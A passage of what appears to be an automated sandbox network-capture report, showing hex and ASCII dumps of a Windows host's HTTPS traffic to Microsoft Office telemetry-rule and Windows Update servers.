                                                                                                                                                                                                                                                                                    2024-11-23 20:12:21 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                    Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:21 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                    Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:21 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                                    Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                    Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                                    Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                                    Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    9192.168.2.549723172.202.163.200443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:21 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CP4fkenoRh1CF+c&MD=1vLSVSte HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                    MS-CorrelationId: acac7c7c-bc93-44f7-bd68-41e71f65864e
                                                                                                                                                                                                                                                                                    MS-RequestId: 86facc59-974f-40d6-be15-0f52044f8ec4
                                                                                                                                                                                                                                                                                    MS-CV: YmNm7AwyIEC5Pvgu.0
                                                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:20 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:22 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    10192.168.2.54973113.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 450
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201224Z-178bfbc474bgvl54hC1NYCsfuw00000004wg00000000drbr
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    11192.168.2.54973413.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 4a9b7938-301e-000c-7880-3d323f000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201224Z-174c587ffdftv9hphC1TEBm29w000000039g00000000fyhh
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    12192.168.2.54973213.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 2980
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 89a9fa5c-d01e-0017-5438-3cb035000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201224Z-178bfbc474bv7whqhC1NYC1fg400000004x000000000dsqb
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    13192.168.2.54973013.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 3788
                                                                                                                                                                                                                                                                                    Connection: close
